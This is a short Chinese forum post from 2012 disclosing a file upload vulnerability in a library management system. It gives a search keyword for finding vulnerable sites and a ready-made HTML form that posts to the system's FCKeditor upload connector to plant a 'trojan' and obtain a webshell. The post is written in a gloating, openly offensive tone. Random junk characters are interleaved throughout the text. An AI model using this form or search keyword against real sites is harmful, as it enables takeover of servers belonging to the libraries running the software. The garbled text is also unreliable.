主题:图书馆系统任意文件上传漏洞7 r. D/ z5 d" W5 a
作者:冰锋刺客% F2 A: K' f1 ~1 J5 v
厂商:点击书(dianjishu.com)- C+ O& v5 ?6 S; \# r3 Z
日期:2012-6-211 k: E1 O; y1 X J) x
$ y5 X* P! J% x) M
I 概述
j( c9 u4 V Q j& A; K' t 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
( t- k/ @4 ^2 K& `& s II 简介. I' O% U/ h$ \3 e( m7 s* m
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"+ U) Z; `& E: ] Z6 u
补充一个漏洞9 x* d H; ?) E x$ h' w
<form id="frmUpload" enctype="multipart/form-data"
, C, B) D7 P: a action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
7 ?" ?3 e, G' a1 { <input id="btnUpload" type="submit" value="操翻他">; c8 {. F* E0 U3 y" e. S+ H' c
</form>4 j# O" c- |9 f) M! J/ B y; A- ]& Z
你们懂的
6 Q% C. u" o4 ?, Q 那傻逼提供还需要改包." {* w8 Z2 s6 S, ~' ~, }
自己看了下源代码发现fckeditor
, _2 `3 v3 m/ |4 V8 \ 直接秒杀7 Q5 t8 L. @( i7 \3 m
|
发表于 2012-9-10 21:20:59
收藏
支持
反对